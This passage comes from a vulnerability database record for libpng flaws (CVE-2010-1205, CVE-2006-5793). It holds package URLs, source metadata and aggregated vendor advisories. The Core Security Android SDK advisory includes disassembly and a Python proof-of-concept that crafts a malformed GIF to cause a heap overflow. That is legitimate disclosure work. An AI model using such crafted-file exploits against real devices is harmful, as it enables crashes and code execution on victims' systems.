"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly-0ubuntu0.9.10.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0-dom-inspector_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1202"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dbg_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1199"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2010-1203"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.5/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.1-dev_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-libthai_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-3.5_3.6.7+build2+nobinonly.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/universe/f/firefox-3.0/firefox-trunk-gnome-support_3.6.7+build2+nobinonly-0ubuntu0.9.04.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.0/firefox-3.0_3.6.7+build2+nobinonly-0ubuntu0.9.04.1.dsc"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.04.2_lpia.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/x/xulrunner-1.9.2/xulrunner-dev_1.9.2.7+build2+nobinonly-0ubuntu0.9.10.2_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/f/firefox-3.5/abrowser_3.6.7+build2+nobinonly-0ubuntu0.9.10.1_all.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-dev_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-gnome-support_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_3.0.6+build2+nobinonly-0ubuntu0.10.04.1.diff.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_3.0.6+build2+nobinonly.orig.tar.gz"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_3.0.6+build2+nobinonly-0ubuntu0.10.04.1.dsc"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-gnome-support_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-dev_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-dbg_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-dbg_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-gnome-support-dbg_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-gnome-support_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-dev_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-gnome-support-dbg_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_amd64.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-gnome-support-dbg_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-dbg_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_i386.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-gnome-support-dbg_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-dev_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-gnome-support_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_sparc.deb"
},
{
"trust": 0.1,
"url": "http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-dbg_3.0.6+build2+nobinonly-0ubuntu0.10.04.1_powerpc.deb"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#643615"
},
{
"db": "VULHUB",
"id": "VHN-43810"
},
{
"db": "VULMON",
"id": "CVE-2010-1205"
},
{
"db": "PACKETSTORM",
"id": "92059"
},
{
"db": "PACKETSTORM",
"id": "92229"
},
{
"db": "PACKETSTORM",
"id": "129524"
},
{
"db": "PACKETSTORM",
"id": "91973"
},
{
"db": "PACKETSTORM",
"id": "94244"
},
{
"db": "PACKETSTORM",
"id": "129513"
},
{
"db": "PACKETSTORM",
"id": "92097"
},
{
"db": "PACKETSTORM",
"id": "91878"
},
{
"db": "PACKETSTORM",
"id": "92111"
},
{
"db": "PACKETSTORM",
"id": "92156"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-473"
},
{
"db": "NVD",
"id": "CVE-2010-1205"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#643615"
},
{
"db": "VULHUB",
"id": "VHN-43810"
},
{
"db": "VULMON",
"id": "CVE-2010-1205"
},
{
"db": "PACKETSTORM",
"id": "92059"
},
{
"db": "PACKETSTORM",
"id": "92229"
},
{
"db": "PACKETSTORM",
"id": "129524"
},
{
"db": "PACKETSTORM",
"id": "91973"
},
{
"db": "PACKETSTORM",
"id": "94244"
},
{
"db": "PACKETSTORM",
"id": "129513"
},
{
"db": "PACKETSTORM",
"id": "92097"
},
{
"db": "PACKETSTORM",
"id": "91878"
},
{
"db": "PACKETSTORM",
"id": "92111"
},
{
"db": "PACKETSTORM",
"id": "92156"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-473"
},
{
"db": "NVD",
"id": "CVE-2010-1205"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-02T00:00:00",
"db": "CERT/CC",
"id": "VU#643615"
},
{
"date": "2010-06-30T00:00:00",
"db": "VULHUB",
"id": "VHN-43810"
},
{
"date": "2010-06-30T00:00:00",
"db": "VULMON",
"id": "CVE-2010-1205"
},
{
"date": "2010-07-22T14:16:23",
"db": "PACKETSTORM",
"id": "92059"
},
{
"date": "2010-07-28T01:22:06",
"db": "PACKETSTORM",
"id": "92229"
},
{
"date": "2014-12-12T17:43:12",
"db": "PACKETSTORM",
"id": "129524"
},
{
"date": "2010-07-20T00:53:34",
"db": "PACKETSTORM",
"id": "91973"
},
{
"date": "2010-09-25T18:50:30",
"db": "PACKETSTORM",
"id": "94244"
},
{
"date": "2014-12-12T17:37:19",
"db": "PACKETSTORM",
"id": "129513"
},
{
"date": "2010-07-23T18:04:51",
"db": "PACKETSTORM",
"id": "92097"
},
{
"date": "2010-07-16T04:34:46",
"db": "PACKETSTORM",
"id": "91878"
},
{
"date": "2010-07-23T19:51:43",
"db": "PACKETSTORM",
"id": "92111"
},
{
"date": "2010-07-26T20:52:04",
"db": "PACKETSTORM",
"id": "92156"
},
{
"date": "2010-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201006-473"
},
{
"date": "2010-06-30T18:30:01.333000",
"db": "NVD",
"id": "CVE-2010-1205"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-07-12T00:00:00",
"db": "CERT/CC",
"id": "VU#643615"
},
{
"date": "2020-08-14T00:00:00",
"db": "VULHUB",
"id": "VHN-43810"
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2010-1205"
},
{
"date": "2021-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201006-473"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2010-1205"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "92229"
},
{
"db": "PACKETSTORM",
"id": "129524"
},
{
"db": "PACKETSTORM",
"id": "92097"
},
{
"db": "PACKETSTORM",
"id": "91878"
},
{
"db": "CNNVD",
"id": "CNNVD-201006-473"
}
],
"trust": 1.0
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "libpng fails to limit number of rows in header",
"sources": [
{
"db": "CERT/CC",
"id": "VU#643615"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201006-473"
}
],
"trust": 0.6
}
}
VAR-200611-0210
Vulnerability from variot - Updated: 2026-03-09 20:12The sPLT chunk handling code (png_set_sPLT function in pngset.c) in libpng 1.0.6 through 1.2.12 uses a sizeof operator on the wrong data type, which allows context-dependent attackers to cause a denial of service (crash) via malformed sPLT chunks that trigger an out-of-bounds read. PNG (Portable Network Graphics) Format image processing library libpng In png_set_sPLT() In the function sPLT In the chunk processing code section, PNG There is a problem that memory access violation occurs due to image processing.Web Pre-crafted, installed on site or attached to email png By browsing the file, service operation interruption (DoS) May be in a state. The 'libpng' graphics library is reported prone to a denial-of-service vulnerability. The library fails to perform proper bounds-checking of user-supplied input, which leads to an out-of-bounds read error. Attackers may exploit this vulnerability to crash an application that relies on the affected library. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-09
http://security.gentoo.org/
Severity: Normal Title: libpng: Denial of Service Date: November 17, 2006 Bugs: #154380 ID: 200611-09
Synopsis
A vulnerability in libpng may allow a remote attacker to crash applications that handle untrusted images.
Background
libpng is a free ANSI C library used to process and manipulate PNG images.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/libpng < 1.2.13 >= 1.2.13
Description
Tavis Ormandy of the Gentoo Linux Security Audit Team discovered that a vulnerability exists in the sPLT chunk handling code of libpng, a large sPLT chunk may cause an application to attempt to read out of bounds.
Impact
A remote attacker could craft an image that when processed or viewed by an application using libpng causes the application to terminate abnormally.
Workaround
There is no known workaround at this time.
Resolution
All libpng users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/libpng-1.2.13"
References
[ 1 ] CVE-2006-5793 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200611-09.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.
License
Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . ----------------------------------------------------------------------
Do you need accurate and reliable IDS / IPS / AV detection rules?
Get in-depth vulnerability details: http://secunia.com/binary_analysis/sample_analysis/
TITLE: Apache Tomcat "RemoteFilterValve" Security Bypass Security Issue
SECUNIA ADVISORY ID: SA32213
VERIFY ADVISORY: http://secunia.com/advisories/32213/
CRITICAL: Not critical
IMPACT: Security Bypass
WHERE:
From remote
SOFTWARE: Apache Tomcat 5.x http://secunia.com/advisories/product/3571/ Apache Tomcat 4.x http://secunia.com/advisories/product/328/
DESCRIPTION: A security issue has been reported in Apache Tomcat, which potentially can be exploited by malicious people to bypass certain security restrictions.
The security issue is caused due to a synchronisation problem when checking IP addresses and can be exploited to bypass a filter valve that extends "RemoteFilterValve" and potentially gain access to protected contexts.
SOLUTION: Apache Tomcat 4.x: Update to version 4.1.32 or later.
Apache Tomcat 5.x: Update to version 5.5.1 or later.
PROVIDED AND/OR DISCOVERED BY: The vendor credits Kenichi Tsukamoto of Fujitsu Limited.
ORIGINAL ADVISORY: Apache: http://tomcat.apache.org/security-4.html http://tomcat.apache.org/security-5.html https://issues.apache.org/bugzilla/show_bug.cgi?id=25835
JVN: http://jvn.jp/en/jp/JVN30732239/index.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDKSA-2006:212 http://www.mandriva.com/security/
Package : doxygen Date : November 16, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
Problem Description:
Doxygen is a documentation system for C, C++ and IDL. (CVE-2006-5793)
In addition, an patch to address several old vulnerabilities has been applied to this build. (CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, CAN-2004-0598, CAN-2004-0599)
Packages have been patched to correct these issues.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1363 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0421 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3334 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5793
Updated Packages:
Mandriva Linux 2006.0: f85fd4b73ca06136e4346df073851e5f 2006.0/i586/doxygen-1.4.4-1.1.20060mdk.i586.rpm 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm
Mandriva Linux 2006.0/X86_64: fc3e569bd8ad2aa9aea76a6f4246cfec 2006.0/x86_64/doxygen-1.4.4-1.1.20060mdk.x86_64.rpm 0842c1496bbb02b79d5cef3386b19380 2006.0/SRPMS/doxygen-1.4.4-1.1.20060mdk.src.rpm
Mandriva Linux 2007.0: 9d0af28627560057e6c80e64bbacf030 2007.0/i586/doxygen-1.4.7-1.1mdv2007.0.i586.rpm f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm
Mandriva Linux 2007.0/X86_64: 7fca6ebbe6f07e51de7fd771678277b4 2007.0/x86_64/doxygen-1.4.7-1.1mdv2007.0.x86_64.rpm f673aab0185f79a8aa048f69b06807bf 2007.0/SRPMS/doxygen-1.4.7-1.1mdv2007.0.src.rpm
Corporate 3.0: 9452cede2d92671808eebe1adfc395ef corporate/3.0/i586/doxygen-1.3.5-2.1.C30mdk.i586.rpm 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm
Corporate 3.0/X86_64: d988dc94c39515b3855116709bcc84de corporate/3.0/x86_64/doxygen-1.3.5-2.1.C30mdk.x86_64.rpm 9e84b6e12b77f43d123888b7ae05e5f4 corporate/3.0/SRPMS/doxygen-1.3.5-2.1.C30mdk.src.rpm
Corporate 4.0: a3b4702c81d1739249d59782efb316dc corporate/4.0/i586/doxygen-1.4.4-1.1.20060mlcs4.i586.rpm 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm
Corporate 4.0/X86_64: 0568b10460c651f18fd3e2a8e76b4300 corporate/4.0/x86_64/doxygen-1.4.4-1.1.20060mlcs4.x86_64.rpm 8223a356c6cf8a790dd20b3d70533f19 corporate/4.0/SRPMS/doxygen-1.4.4-1.1.20060mlcs4.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux)
iD8DBQFFXMIpmqjQ0CJFipgRAnt1AJ9NuzEsIC9PzHE278eZAhOPHjMh8QCePD/Q pK8OJ2vhx3DqZ400EPH5QMw= =R8Jo -----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
Multiple vulnerabilities in Google's Android SDK
Advisory Information
Title: Multiple vulnerabilities in Google's Android SDK Advisory ID: CORE-2008-0124 Advisory URL: http://www.coresecurity.com/?action=item&id=2148 Date published: 2008-03-04 Date of last update: 2008-03-04 Vendors contacted: Google Release mode: Coordinated release
Vulnerability Information
Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269
Vulnerability Description
Android is project promoted primarily by Google through the Open Handset Alliance aimed at providing a complete set of software for mobile devices: an operating system, middleware and key mobile applications [1]. Although the project is currently in a development phase and has not made an official release yet, several vendors of mobile chips have unveiled prototype phones built using development releases of the platform at the Mobile World Congress [2]. Development using the Android platform gained activity early in 2008 as a result of Google's launch of the Android Development Challenge which includes $10 million USD in awards [3] for which a Software Development Kit (SDK) was made available in November 2007.
The Android Software Development Kit includes a fully functional operating system, a set of core libraries, application development frameworks, a virtual machine for executing application and a phone emulator based on the QEMU emulator [4]. Public reports as of February 27th, 2008 state that the Android SDK has been downloaded 750,000 times since November 2007 [5].
Several vulnerabilities have been found in Android's core libraries for processing graphic content in some of the most used image formats (PNG, GIF an BMP). While some of these vulnerabilities stem from the use of outdated and vulnerable open source image processing libraries other were introduced by native Android code that use them or that implements new functionality.
Exploitation of these vulnerabilities to yield complete control of a phone running the Android platform has been proved possible using the emulator included in the SDK, which emulates phone running the Android platform on an ARM microprocessor.
This advisory contains technical descriptions of these security bugs, including a proof of concept exploit to run arbitrary code, proving the possibility of running code on Android stack (over an ARM architecture) via a binary exploit.
Vulnerable Packages
. Android SDK m3-rc37a and earlier are vulnerable several bugs in components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of this advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component that process BMP images (bug #3).
Non-vulnerable Packages
. Android SDK m5-rc15
Vendor Information, Solutions and Workarounds
Vendor statement:
"The current version of the Android SDK is an early look release to the open source community, provided so that developers can begin working with the platform to inform and shape our development of Android toward production readiness. The Open Handset Alliance welcomes input from the security community throughout this process. There will be many changes and updates to the platform before Android is ready for end users, including a full security review."
Credits
These vulnerabilities were discovered by Alfredo Ortega from Core Security Technologies, leading his Bugweek 2007 team called "Pampa Grande". It was researched in depth by Alfredo Ortega.
Technical Description / Proof of Concept Code
Android is a software stack for mobile devices that includes an operating system, middleware and key applications. Android relies on Linux version 2.6 for core system services such as security, memory management, process management, network stack, and driver model. The kernel also acts as an abstraction layer between the hardware and the rest of the software stack.
The WebKit application framework is included to facilitate development of web client application functionality. The framework in turn uses different third-party open source libraries to implement processing of several image formats.
Android includes a web browser based on the Webkit framework that contains multiple binary vulnerabilities when processing .GIF, .PNG and .BMP image files, allowing malicious client-side attacks on the web browser. A client-side attack could be launched from a malicious web site, hosting specially crafted content, with the possibility of executing arbitrary code on the victim's Android system.
These client-side binary vulnerabilities were discovered using the Android SDK that includes an ARM architecture emulator. Binary vulnerabilities are the most common security bugs in computer software. Basic bibliography on these vulnerabilities includes a recently updated handbook about security holes that also describes current state-of-the-start exploitation techniques for different hardware platforms and operating systems [6].
The vulnerabilities discovered are summarized below grouped by the type of image file format that is parsed by the vulnerable component.
#1 - GIF image parsing heap overflow
The Graphics Interchange Format (GIF) is image format dating at least from 1989 [7]. It was popularized because GIF images can be compressed using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the memory footprint and bandwidth required for transmission and storage.
A memory corruption condition happens within the GIF processing library of the WebKit framework when the function 'GIFImageDecoder::onDecode()' allocates a heap buffer based on the Logical Screen Width and Height filed of the GIF header (offsets 6 and 8) and then the resulting buffer is filled in with an amount of data bytes that is calculated based on the real Width and Height of the GIF image. There is a similar (if not the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the open-source version included by Android in 'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp' inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].
Detailed analysis:
When the process 'com.google.android.browser' must handle content with a GIF file it loads a dynamic library called 'libsgl.so' which contains the decoders for multiple image file formats.
Decoding of the GIF image is performed correctly by the library giflib 4.0 (compiled inside 'libsgl.so'). However, the wrapper object 'GIFImageDecoder' miscalculates the total size of the image.
First, the Logical Screen Size is read and stored in the following calling sequence (As giflib is an Open Source MIT-licenced library, the source was available for analysis): 'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last function, 'DGifGetScreenDesc()', stores the Logical Screen Width and Height in a structure called 'GifFileType':
/-----------
Int DGifGetScreenDesc(GifFileType * GifFile) { ... / Put the screen descriptor into the file: / if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR || DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR) return GIF_ERROR; ... } - -----------/
We can see that the fields are stored in the first 2 words of the structure:
/-----------
typedef struct GifFileType { / Screen dimensions. / GifWord SWidth, SHeight, ... } - -----------/
In the disassembly of the GIFImageDecoder::onDecode() function provided below we can see how the DGifOpen() function is called and that the return value (A GifFileType struct) is stored on the $R5 ARM register:
/-----------
.text:0002F234 BL DGifOpen .text:0002F238 SUBS R5, R0, #0 ; GifFile - $R5 - -----------/
Then, the giflib function 'DGifSlurp()' is called and the Image size is correctly allocated using the Image Width and Height and not the Logical Screen Size:
/-----------
Int DGifSlurp(GifFileType * GifFile) { ... ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height; sp->RasterBits = (unsigned char *)malloc(ImageSize * sizeof(GifPixelType)); ... } - -----------/
Afterwards the Logical Screen Width and Height are stored in the R9 and R11 registers:
/-----------
.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight ! - -----------/
However the actual image may be much larger that these sizes that are incorrectly passed to a number of methods of the 'GIFImageDecoder':
/-----------
ImageDecoder::chooseFromOneChoice(): .text:0002F294 MOV R0, R8 .text:0002F298 MOV R1, #3 .text:0002F29C MOV R2, R9 .text:0002F2A0 MOV R3, R11 .text:0002F2A4 STR R12, [SP,#0x48+var_3C] .text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice; ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int ,int)
Bitmap::setConfig(): .text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap .text:0002F2BC MOV R1, #3 .text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight ! .text:0002F2C4 MOV R3, R11 .text:0002F2C8 STR R10, [SP,#0x48+var_48] .text:0002F2CC BL _Bitmap9setConfig ; Bitmap::setConfig(SkBitmap::Config,uint,uint,uint) - -----------/
This function stores the SWidth and SHeight inside the Bitmap object as shown in the following code snippet:
/-----------
.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7 .text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8 .text:00035C40 MOV R4, R0 ; $R4 = *Bitmap - -----------/
And later:
/-----------
.text:00035C58 BL _Bitmap15ComputeRowBytes ; SkBitmap::ComputeRowBytes(SkBitmap::Config,uint) .text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes .text:00035C68 STRH R7, [R4,#0x18] ; Bitmap+0x18 = SWidth .text:00035C6C STRH R8, [R4,#0x1A] ; Bitmap+0x1A = SHeight .text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes - -----------/
The following python script generates a GIF file that causes the overflow. It requires the Python Imaging Library. Once generated the GIF file, it must be opened in the Android browser to trigger the overflow:
/-----------
Android Heap Overflow
Ortega Alfredo _ Core Security Exploit Writers Team
tested against Android SDK m3-rc37a
import Image import struct
Creates a good gif image
imagename='overflow.gif' str = '\x00\x00\x00\x00'*30000 im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1) im.save(imagename,'GIF')
Shrink the Logical screen dimension
SWidth=1 SHeight=1
img = open(imagename,'rb').read() img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:]
Save the bad gif image
q=open(imagename,'wb=""') q.write(img) q.close() - -----------/
This security bug affects Android SDK m3-rc37a and earlier versions. Version m5-rc14 of the Android SDK includes a fix and is not vulnerable to this bug.
#2 - PNG image parsing, multiple vulnerabilities:
